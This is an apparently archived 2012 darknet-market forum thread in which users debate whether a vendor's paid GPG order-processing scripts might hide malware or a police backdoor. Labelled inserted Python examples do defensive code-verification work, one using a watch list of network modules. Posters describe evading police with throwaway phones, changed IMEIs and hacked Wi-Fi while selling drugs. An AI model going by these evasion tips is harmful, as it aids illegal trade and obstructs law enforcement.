No, it's just .py and .sh scripts which are executable.  The closed source claim is a red herring to back up the LE false assumption.

^because pine is le, been trying to tell you guys that.

You're welcome to your opinion, but please hold off on the accusations without proof.

Now you see it, now you don't. Interesting.

I'm not sure what you're referring to here.  Spacecase's comment is still in the thread (at least at the time of this post).

As for my comments, my reply to kmfkewm is accurate and my view of false accusations should be abundantly clear.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 09:51 am
Open source. Licenses. Rules. WTF? We sell fucking drugs here. There are hacked websites and programs and stolen shit galore!

Why would anyone give a crap about proper code license?

I'm sure many won't, but I opted to include it.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck on September 06, 2012, 10:00 am
I think that your replies make sense.  I guess if people are so paranoid why not let specific members of the forum check the code out?  Maybe you should give the code to kmf and he could check it out and confirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way.  Just a suggestion though.  To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way.  It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.
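
The comparison suggested in the post above, and the per-file SHA256 checksums LouisCyphre mentions earlier in the thread, can be done mechanically. This is an added example, not part of any post and not LouisCyphre's code: it assumes a reviewer publishes a sha256sum-style manifest over a channel the seller does not control; `orders.py` and `helper.py` are made-up file names and all file contents are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

HEX = set("0123456789abcdef")


def sha256_file(path, chunk_size=65536):
    """Stream a file through SHA-256 so large files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def format_manifest(manifest):
    """Render in the 'digest, two spaces, name' layout that sha256sum prints."""
    return "".join(f"{d}  {n}\n" for n, d in sorted(manifest.items()))


def parse_manifest(text):
    """Parse sha256sum-style lines strictly; a malformed line is an error."""
    manifest = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        digest, marker, name = line[:64].lower(), line[64:66], line[66:]
        if (len(digest) != 64 or set(digest) - HEX
                or marker not in ("  ", " *") or not name):
            raise ValueError(f"line {lineno}: not a sha256sum entry")
        if name in manifest:
            raise ValueError(f"line {lineno}: duplicate entry for {name}")
        manifest[name] = digest
    return manifest


def compare(reference, received):
    """Report every way the received copy differs from the reference manifest."""
    both = reference.keys() & received.keys()
    return {
        "changed": sorted(n for n in both if reference[n] != received[n]),
        "missing": sorted(reference.keys() - received.keys()),
        "unexpected": sorted(received.keys() - reference.keys()),
    }


def demo():
    """Constructed bundles: the reviewer's copy and a later, altered download."""
    files = {"messages.sh": b"#!/bin/bash\ngpg --decrypt-files *.asc\n",
             "orders.py": b"import csv\n",
             "README.txt": b"1) Open a terminal\n"}
    with tempfile.TemporaryDirectory() as tmp:
        reviewer, buyer = Path(tmp, "reviewer"), Path(tmp, "buyer")
        for root in (reviewer, buyer):
            root.mkdir()
            for name, data in files.items():
                (root / name).write_bytes(data)
        # The later download differs: one file edited, one file added.
        (buyer / "orders.py").write_bytes(b"import csv\n# changed after review\n")
        (buyer / "helper.py").write_bytes(b"pass\n")
        published = format_manifest(build_manifest(reviewer))
        return compare(parse_manifest(published), build_manifest(buyer))


if __name__ == "__main__":
    print(demo())
```

A clean report only shows that the buyer holds the same bytes the reviewer examined; it says nothing about whether those bytes are safe.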
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 10:13 am
I am guilty of not using semantics appropriately here, nothing more. All the actual facts remain the same. This GPL thing is a distraction from those.

Not intentionally.  If you'd said what you meant in the first place then it wouldn't have been an issue, but you were too busy ranting.

You see:

Quote
open source and the code is available for everyone here to audit

That is what I meant by open source. That the code was closed source because it could not be analyzed by everybody here independently.

Technically, yes, this is incorrect semantics, code can be open source but still not viewable to the general public.

If you can't say what you mean, how do you expect anyone to believe that you mean what you say?

Albeit I could argue that defies the spirit of what "open" is supposed to mean, but that's a discussion for a different day. If this were a normal forum, this would be for the birds. It is not, and so it is not.

If you want to pick that fight then go pick it with the Free Software Foundation.

Again, none of the above should have any bearing on this discussion because at *worst* Pine is guilty of being wrong about a technicality or even possibly not knowing a programming language,

A lot more than just one technicality.  You've been blatantly making shit up about both me and the code.

and at *best* Louis Cyphre is guilty of being exceptionally naive for an IT security conscious person and abusing the good reputation he's built up by encouraging others to adopt systems that must be insecure by default. And you know the worst case.

Meh.  I'm trying to find a balance between financial remuneration for my work and providing a product that is safe to use.

Frankly it doesn't matter whether or not I really am law enforcement or the devil or even a hamster.  You can take or leave my posts as you see fit and you can take or leave my products or services as you see fit, just as I can do the same for you and anyone else here.  The posts will speak for themselves, as will the code with those people who choose to use it.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck on September 06, 2012, 10:28 am
"Meh.  I'm trying to find a balance between financial remuneration for my work and providing a product that is safe to use."

To me this is what a lot of people are disagreeing with.  No one seems to believe that you've found that balance.  What makes you think the vendors have the skills necessary to tell whether what they get is a safe product?  I think that the other posters here are really off base and pine is over exaggerating things but don't you think that there has to be a better possible way to provide your product safely?  Hypothetically none of the people buying your software would have the skills necessary to audit it so that giving them the open source code would do absolutely nothing to make things safer.  This is why I think that this thread should be more about trying to find a better balance between your financial remuneration and providing a product that is safe to use rather than somewhat childish accusations etc.

  In the end the more that you avoid giving actual programmers the code or finding a better solution than "buy it or don't buy it" then the more suspicious this becomes imo.  I think both sides agree that it is possible for your software to contain exploits but where you disagree is that you believe that giving the vendors who will be using your product the source code is enough to make things safe whereas few others do.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 10:40 am
Quote
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated.  Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC.  I'm basing this opinion on my experience with PGP Club and GPG instruction in other threads and via PMs.

And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.

Hmmm, that's the only cogent argument against my current business model.  I'll think about it.

Quote
There's nothing in the GPL which prevents selling the code under that license.  In fact, here's the part of the FAQ which relates to it:

Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.

My mistake, I thought Pine was talking about open source as in open source, not "open source" as in "do it my way or I'll make false accusations about you in a public forum."

Quote
I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.

Uh-huh.  So you've got a vendor account and inspected all the code that the vendors see?

Quote
It's possible to compile Python code as a Windows executable, but that's not what this is.  I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb.  Ridiculous.  I'd rather just install Python, if it's not already installed, and run the code.

I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straightforward.  I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.

It is possible to make a windows executable out of a Ruby script as well, but it contains the actual script and a ruby interpreter inside of it ;).

Neat trick, but wouldn't it be enormous every time?

The Python version just compiles in C and Python code from all the modules and libs, linked to the relevant DLLs to run on Windows.

I have no real idea, but I wouldn't be surprised if it is the same thing with python. Yeah I also think it is pretty straightforward to reverse engineer bytecode, but I was trying to imagine what a closed source python program would look like.

Yeah, I'm not sure what that would be either.  So I Googled it and found this (clearnet, obviously):

http://stackoverflow.com/questions/4352866/how-can-i-make-closed-source-portable-python-application

Apparently it can be done, but there are still no guarantees that it won't be reverse engineered.  I can't be bothered actually looking into how to obscure code.

I don't know Python

A pity, oh well, I'm sure someone else who does will turn up eventually.

but I do know Ruby and even the .exe's contain the source code in them, they are a cheap gimmick that packages an interpreter and the script into a single executable file.

It is a cheap gimmick, especially since it could still be executing something else.  That's why I like the idea of the source being the entire program.
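
On the point above that Python bytecode is straightforward to reverse engineer, an added example (not code from the thread or from anyone in it): it compiles a constructed script to the code object a .pyc file would hold and recovers its imports and string constants with the standard dis module, which is what an auditor would look at first. The sample source and the NETWORK_MODULES watch list are assumptions.

```python
"""Recover imports and string constants from compiled Python bytecode."""
import dis
import marshal
import types

# Assumed watch list: top-level modules that let a script talk to the network.
NETWORK_MODULES = {"socket", "ssl", "urllib", "urllib2", "httplib", "http",
                   "ftplib", "smtplib", "requests"}

# Constructed sample, standing in for a script shipped without readable source.
SAMPLE_SOURCE = '''
import csv

def process(path):
    import subprocess
    from urllib import request
    with open(path) as fh:
        for row in csv.reader(fh):
            subprocess.call(["gpg", "--decrypt", row[0]])
    request.urlopen("http://example.invalid/report")
'''


def load_bytecode(source, name="<constructed>"):
    """Compile and round-trip through marshal, the serialisation a .pyc uses."""
    return marshal.loads(marshal.dumps(compile(source, name, "exec")))


def walk(code):
    """Yield a code object and every nested code object (functions, classes)."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk(const)


def summarise(code):
    """Return the imports, string constants and network imports in the bytecode."""
    imports, strings = set(), set()
    for obj in walk(code):
        for ins in dis.get_instructions(obj):
            if ins.opname == "IMPORT_NAME":      # covers "import x" and "from x import y"
                imports.add(ins.argval)
        strings.update(c for c in obj.co_consts if isinstance(c, str))
    flagged = sorted(m for m in imports if m.split(".")[0] in NETWORK_MODULES)
    return {"imports": sorted(imports),
            "strings": sorted(strings),
            "network_imports": flagged}


if __name__ == "__main__":
    report = summarise(load_bytecode(SAMPLE_SOURCE))
    for key, value in report.items():
        print(key, value)
```

An import hidden inside a function body is found as well, because nested code objects are walked; names built at run time (for example via __import__ with a computed string) would only show up among the string constants, if at all.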
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Bungee54 on September 06, 2012, 10:41 am
Thanks for everyone discussing the matter.

We have recognized Louis Script yesterday and were interested.

We assume we are pretty good with computing & security in general...but don't know shit about programming.

But we know at least so much that we could see that those Python scripts have a minuscule chance of being an Attack.

Also it is really easily verified. There are a million clearnet forums out there to check this or find ppl to do this.

We still want to marry pine someday through cryptographical contract :)  but this time she was a little bit too hasty.

Warning of probable malware and advising being cautious is a good thing but directly marking it as malware is not a good move.

Pine and Louis are both great for the community and we don't suspect LEO. Even their help is appreciated as with some proper measures it is very very hard to get caught :)

We will order a customized version of the script sometime in the future  ..we long searched for something like this.

What are the probabilities of an Auto - Answer script being developed or feasible?  Warweed seems to use something like this.

Cheers


disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
These scripts will only be used in torbox images.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Bungee54 on September 06, 2012, 10:46 am
Idea for verification->

Let 5 "trusted" members verify the source and publish the MD5 hash.

Do that with every version.

Donate to the members and cyphre. DONATE ENOUGH FOR THEM!

Give away scripts for free. Work together for the good of the community. Public development thread.
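
The verification scheme proposed in this post, sketched as an added example (not code from the thread or from the script under discussion): a recipient hashes the file they were given and accepts it only if enough auditors published the same digest for that version. It uses SHA-256 where the post says MD5, because MD5 collisions are practical; the auditor names, quorum size and sample file contents are constructed.

```python
"""Quorum check of a received script against digests published by auditors."""
import hashlib
from dataclasses import dataclass, field


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class Verdict:
    accepted: bool
    digest: str                                     # digest of the file actually received
    matching: list = field(default_factory=list)    # auditors who published that digest
    variants: int = 0                               # distinct digests published for the version
    reason: str = ""


def check_release(received: bytes, version: str, published: dict, quorum: int) -> Verdict:
    """published maps version -> {auditor name: hex digest that auditor posted}."""
    mine = sha256_hex(received)
    attestations = published.get(version)
    if not attestations:
        # "Do that with every version": an unattested version is never accepted.
        return Verdict(False, mine, reason="no auditor has published a digest for this version")
    # Tolerate case and whitespace differences in digests pasted into forum posts.
    normalised = {who: d.strip().lower() for who, d in attestations.items()}
    matching = sorted(who for who, d in normalised.items() if d == mine)
    variants = len(set(normalised.values()))
    if len(matching) < quorum:
        reason = "only %d of %d auditors vouch for this exact file" % (len(matching), len(normalised))
    elif variants > 1:
        # Auditors were not all looking at the same bytes: different copies are circulating.
        reason = "quorum met, but auditors published differing digests"
    else:
        reason = "quorum met"
    return Verdict(len(matching) >= quorum, mine, matching, variants, reason)


# Constructed sample data: one audited file, one altered copy, five auditors.
AUDITED = b"#!/usr/bin/env python\nimport csv\n# constructed stand-in for the audited script\n"
ALTERED = AUDITED + b"import socket\n"
PUBLISHED = {
    "1.0": {
        "auditor_a": sha256_hex(AUDITED),
        "auditor_b": sha256_hex(AUDITED).upper(),       # pasted in upper case
        "auditor_c": " " + sha256_hex(AUDITED) + "\n",  # pasted with stray whitespace
        "auditor_d": sha256_hex(AUDITED),
        "auditor_e": sha256_hex(ALTERED),               # this auditor was handed a different file
    }
}

if __name__ == "__main__":
    for label, blob, version in (("audited copy", AUDITED, "1.0"),
                                 ("altered copy", ALTERED, "1.0"),
                                 ("unattested version", AUDITED, "1.1")):
        v = check_release(blob, version, PUBLISHED, quorum=3)
        print(label, "->", "ACCEPT" if v.accepted else "REJECT", "|", v.reason)
```

The check only proves that the received bytes are the ones the auditors hashed; it says nothing about how well they read the code, and the published digests must come from the auditors' own posts rather than from the seller.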

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 11:02 am
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If it's clean and it works, we will see!

Unfortunately for us all it is not so simple, for the reasons I have posted in my responses, this won't show or prove anything at all.

Only if your assumptions about there being backdoors in every implementation of GPG, release of Bash and release of Python since version 2.3 (when the csv module was added) or in HTMLDOC are correct.  You go prove that.  I'll wait.

I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pine's concern,

I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

Haha, wow, what a redirection. Nice try.

Really?  I believe kmfkewm has already addressed this, but go and Google:

* html exploit
* css exploit
* cgi exploit
* php exploit
* jpg exploit

To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

Uh, you do realise that everything you see is rendered on your system, right?

All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage with just those components cannot contain an exploit for you to worry about because it's not even programming code.

See above search topics and kmfkewm's response to you.

Also, do you have a vendor account to verify that it is the same for them as for buyers?

And if SR indeed did offer up its server side code as open source, LE would surely be delighted to examine it for weaknesses.

Yes, they would.  Which is one of the two most likely reasons it has not been released (the other being competition).

You see, SR *may* use software as a base that is open source in and of itself, but this does not imply you should make open source the specific way in which you're making use of the said open source software. It's apples and oranges. If this was a real war, it'd be like the difference between the enemy knowing you have tanks, and the enemy actually knowing the tank placements. Again, LouisCyphre surely already knows this.

Of course I do, I also know that one of the largest vectors for attack is dodgy code on a website.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 11:12 am
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If it's clean and it works, we will see!
now, IF he were LE, then he could release one version of the code into the wild to be audited, while selling another because it "includes support" there would be no way of knowing whether the code being audited is the same as the one being sold.

Well, they could just compare it.

If the code gets posted I won't bother with the current listing, I'll just provide support for it as a service, but if I do that then I'll charge my full professional consulting rate (with adjustments for currency conversion and laundering).  By the way, that rate is higher per hour than the price of the current listing.  I'm still considering that avenue.

and I agree with kmf that anyone capable of auditing the code is equally capable of writing it,

I've already stated what my code does, there's nothing stopping anyone from writing and releasing their own implementation.

so the market for your "closed" (by pine's definition not having the source before running it) software is only the low hanging fruit, which is notoriously LE's favorite target.

Not quite.  The really low hanging fruit is the vendors using Windows systems and I haven't ported it to Windows yet.  I'm certainly not inclined to right now.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 06, 2012, 11:12 am
Having read the whole thread through, I think you both (pine & LouisCyphre) do make some very good points. Pine, you are looking out for vendors' operational security, and LouisCyphre, you are looking to make vendors' lives a little more convenient by selling them a digital good. Security Vs. Convenience. As has been proven many, many times in the past the two are on opposite ends of the spectrum, and usually for good reason.

I can completely understand LouisCyphre's reluctance to release the code without somebody paying for it; it would essentially be releasing his work for all and sundry to use without paying him for it. This is an agorist marketplace, and he is under no obligation to release the code in order to sell his product. Those who wish to buy it and check the code for anything malicious are free to do so.

I can also completely understand pine's insistence that the code be released and checked before it is implemented by anyone; this is good security practice, but the fact that this is a product that is for sale by a registered vendor on an agorist marketplace makes this request more than a little unreasonable. People are free to buy and sell any product they wish here, as long as it is not on the restricted items list, including items such as the one that is the subject of this debate and baseless accusation.

Yes, warn vendors to go through the code with a fine-tooth comb should they purchase this item, but that's something that they should be doing anyway with anything that could potentially compromise them. It would do no harm to anyone to post this recommendation, but your statement will likely harm LouisCyphre's business prospects and damage his good reputation in the community. This is essentially slander.

Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.

If you've seen my previous posts you'll know that I'm not one to take sides in an argument. I try to be as neutral as possible, view things objectively and attempt to do so logically.
There have been a lot of unfounded accusations thrown around these forums lately by quite a large number of people; many of these accusations are based on pure conjecture, and that is also the case here as there is no evidence to suggest or back up your claims that LouisCyphre is LE.
If you purchase the code and it does have malicious intent, you can stand behind your claim with proof.
Whilst it is of course possible that the copy you receive may be different than everybody else's, it is terribly foolish to make claims based on pure conjecture, especially claims as serious as this.

- grahamgreene
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 11:20 am
A general point I neglected to mention which may explain some of this situation:

People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.

That is interesting since DPR already knew what I was doing before I made the listing.  He has not (yet) taken me up on my offer to provide a copy of the code for his own peace of mind.

You're right about the agorist philosophy behind his response too.  You were asking him to regulate the market, which is the antithesis of what an agorist market is.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 11:36 am
I agree that this is a bad way to make money for louis and that he should probably just release it open source with a tip jar.  I also don't know how many people would buy it either way or even if people would use such software if it was free so this whole thing strikes me as bizarre.  It just doesn't make sense to me really but everyone could use some extra cash I guess.

I really doubt the tip jar would get anything more than fragments of BTC.  If that were not the case then surely the address in my sig would've received more after certain GPG guides were posted (which are arguably more useful to more people).  So arguments from others (Pine and kmfkewm in particular) that that would be a viable income stream are based on a significant overestimation of the generosity of Silk Roadians.

All in all I think louis just didn't think through how this might look to others.

I expected some questions, but I didn't really expect the level of paranoid delusional accusations coming from Pine.  I thought s/he/it would like something which made it easier for vendors currently saying no to encrypted orders to be able to use it with greater ease.  Clearly I was wrong.

It's so fucking simple in the end:  Unless louis releases the code then we can't trust the program and there really isn't anything to it but that in my opinion.  So why the long ass posts etc?  I mean it's like all of you live in derpaderpistan or something.

It's even simpler than that:  If you don't want to use it for whatever reason, don't buy it.  If you do, buy it, I'll help you set it up, explain exactly what it does and how, provide best recommendations for secure use and if it turns out I'm fucking with you then you can provide that proof to DPR and he can terminate my account.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 11:47 am
....all this and I think all it's really about is Pine wanting a free copy......just ask sweetheart....just ask....

lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think it's kind of been forgotten that Louis created this out of request by another vendor... why doesn't someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer.

There is a comment posted on the first page of the thread confirming the independent running of the code and that poster was attacked by Pine.  Pine did not address the explicit statement that it has been run elsewhere.

LE can't just traffick mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying...

Careful, you might start sounding logical there.  ;)

nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.

Thanks.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 11:55 am
Awesome! I'm no vendor but I want to buy this software and have a looksy inside its guts!

Go right ahead.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:13 pm
I think that your replies make sense.  I guess if people are so paranoid why not let specific members of the forum check the code out?

It's already been offered to DPR and a fairly major vendor already has it.

Maybe you should give the code to kmf and he could check it out and confirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way.  Just a suggestion though.

Kmf has already said he uses Ruby, not Python.  So I'd need to find someone else here whose Python skills I trust.

To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way.  It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.

It's a matter of trust.  Sure I could send a copy to kmfkewm and a copy to Pine and say, go speak to people you know and verify it.  Can you guess what will happen then?  They'll post it to the forum and tell me to suck it (if I were to bet on it, I reckon Pine would post first).

Now can you guess what happens after that?

1)  I will be proven right (eventually).
2)  We will discover that there really aren't as many people capable of auditing it properly as Pine might think.
3)  My "tip jar" in my signature will receive sweet fuck all and I can go back to the drawing board.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:44 pm
"Meh.  I'm trying to find a balance between financial remuneration for my work and providing a product that is safe to use."

To me this is what a lot of people are disagreeing with.  No one seems to believe that you've found that balance.

Either that or they just want free stuff.  It's funny, no one seems to think it's unfair if a drug vendor refuses to provide a sample, but I have to provide the entire product.

What makes you think the vendors have the skills necessary to tell whether what they get is a safe product?

A line-by-line explanation of precisely what everything does, with links to Python documentation and sample code for verification should suffice.  Seriously, if they can follow my instructions for using GPG on the command line then they will be able to follow this.

I think that the other posters here are really off base and pine is over exaggerating things but don't you think that there has to be a better possible way to provide your product safely?

Better than the above?  Not while still getting paid or without revealing my real identity.

Hypothetically none of the people buying your software would have the skills necessary to audit it so that giving them the open source code would do absolutely nothing to make things safer.

The method I just described might help.

This is why I think that this thread should be more about trying to find a better balance between your financial remuneration and providing a product that is safe to use rather than somewhat childish accusations etc.

Look, if you can think of something better, I'm listening.

  In the end the more that you avoid giving actual programmers the code or finding a better solution than "buy it or don't buy it" then the more suspicious this becomes imo.

I know some very good Python developers I'd trust to audit it, but to my knowledge they're not on Silk Road.  They certainly don't know that I am and I'd really like to keep it that way.

I think both sides agree that it is possible for your software to contain exploits but where you disagree is that you believe that giving the vendors who will be using your product the source code is enough to make things safe whereas few others do.

In conjunction with a thorough explanation with proof that I can't fake.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: sickgirl on September 06, 2012, 12:49 pm
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarten, and typing in my first commands in Basic on a Commodore PET. Incredibly presumptuous of you. I know quite a bit about coding and exploits, and have participated in and planned a few black hat events in my day. As for understanding code, ...do you actually think that everyone on here uses the Vidalia tor browser bundle to connect to SR?  Nope. Coded my own client to work more efficiently, hence the reason I am *almost* never bothered with the timeouts. Your tin foil hat paranoia could have easily been avoided (along with all the unnecessary FUD you probably created amongst the n00bs) by simply addressing these issues in a fucking PM.  @Louis, I do not have much in my account, just over a coin after I placed my orders for the week, but consider it my contribution to your tip jar...I for one am suspect at the true motive of pine in ranting like a crazy woman even AFTER her concerns were addressed. Now that the code is up, zhe is mysteriously silent. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine?  ..........sickgirl
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 01:03 pm
Thanks for everyone discussing the matter.

We have recognized Louis Script yesterday and were interested.

We assume we are pretty good with computing & security in general...but don't know shit about programming.

But we know at least so much that we could see that those Python scripts have a minuscule chance of being an Attack.

Thanks.

Also it is really easily verified. There are a million clearnet forums out there to check this or find ppl to do this.

Yep.  Not to mention a lot of documentation on places like python.org and diveintopython.net.

We still want to marry pine someday through cryptographical contract :)  but this time she was a little bit too hasty.

Warning of probable malware and advising being cautious is a good thing but directly marking it as malware is not a good move.

This is appreciated.

Pine and Louis are both great for the community and we don't suspect LEO. Even their help is appreciated as with some proper measures it is very very hard to get caught :)

Cheers.  I don't actually think s/he is either.

We will order a customized version of the script sometime in the future  ..we long searched for something like this.

I look forward to that.  :)

What are the probabilities of an Auto - Answer script being developed or feasible?  Warweed seems to use something like this.

If there were an API it would be dead simple.  There isn't.  It should still be possible to use HTTP-Post to interact with the pages.  I presume that's what Warweed does, with an always on system, constantly logged in to check the orders page every minute and then respond with a PM once an order is recognised.

Unless, of course, Warweed is actually a vendor account created by SR staff and can run directly on the system.  I think it's the former, though, because the recent academic report on SR confirmed that a session ID could be used by a bot to crawl the site.  Whoever is running Warweed just needs to login as normal occasionally and update the session ID used by his or her script.

disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
These scripts will only be used in torbox images.

Cool.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck on September 06, 2012, 01:17 pm
Well, your explanations make sense to me and I think everyone here appreciates you taking so much of your time to respond in such depth.  Anyway, I think that your comparison to drug dealers is a little inconsistent because new vendors usually have to give out samples and/or provide proof that their products are safe such as reagent tests etc. in order to gain customers.  You say you will give step by step instructions/explanations to purchasers but couldn't you hypothetically lie whenever you wanted to in that?  So again, I just don't think you've done enough to prove that your program is safe.  I can't think of anything better other than releasing it for free or handing it to people who could check it out (and these people may not exist on sr) but maybe someone can.  Honestly I do doubt that it has any exploits and I don't really know enough about programming to judge everything in your posts so maybe everything in this thread is just paranoid ranting about exploits that really aren't plausible.  But if it is at all possible it's better to stay safe though no?


"Now can you guess what happens after that?

1)  I will be proven right (eventually).
2)  We will discover that there really aren't as many people capable of auditing it properly as Pine might think.
3)  My "tip jar" in my signature will receive sweet fuck all and I can go back to the drawing board."

Personally this would be my guess as well but in the end all I have at the moment is an educated guess and for me that isn't enough.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: sickgirl on September 06, 2012, 01:25 pm
I just don't think you've done enough to prove that your program is safe.  I can't think of anything better other than releasing it for free or handing it to people who could check...

He did. Reread the posts. He released the source/scripts. What more do you want? What more does he have to do? It is there, on the board, in this thread, ready to be examined and vetted by anyone who would like. *facepalm*
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 01:36 pm
@Louis, I do not have much in my account, just over a coin after I placed my orders for the week, but consider it my contribution to your tip jar...I for one am suspect at the true motive of pine in ranting like a crazy woman even AFTER her concerns were addressed. Now that the code is up, zhe is mysteriously silent. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine?  ..........sickgirl

Cheers.  :)

Although I should mention that the bash script is just what I whipped up in a couple of hours (well, 3) and served as the proof-of-concept prior to coding SROPPy.  It also uses the BSD version of split with pattern matching, which the Linux version apparently lacks.

SROPPy took a few days with correspondence with the vendor and trying a few different things.  It's cleaner and includes code to work with unencrypted address data.  The Python code and use of the csv module made the split component of the script unnecessary.

The irony is that the bash script could make Pine's life easier with PGP Club if she deigns to use it (assuming she has BSD's split and not Linux's one).
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 01:59 pm
Well, your explanations make sense to me and I think everyone here appreciates you taking so much of your time to respond in such depth.

As GrahamGreene pointed out, I'm being slandered left and right here.  I don't really have a choice except to make time.

Anyway, I think that your comparison to drug dealers is a little inconsistent because new vendors usually have to give out samples and/or provide proof that their products are safe such as reagent tests etc. in order to gain customers.

The reagent tests, sure, but the samples can still be skipped just by accepting orders from new buyers until they've got some feedback to prove they're the real deal.

You say you will give step by step instructions/explanations to purchasers but couldn't you hypothetically lie whenever you wanted to in that?

Not with corroborating evidence from unimpeachable documentation (e.g. on python.org) that shows I'm not doing that.

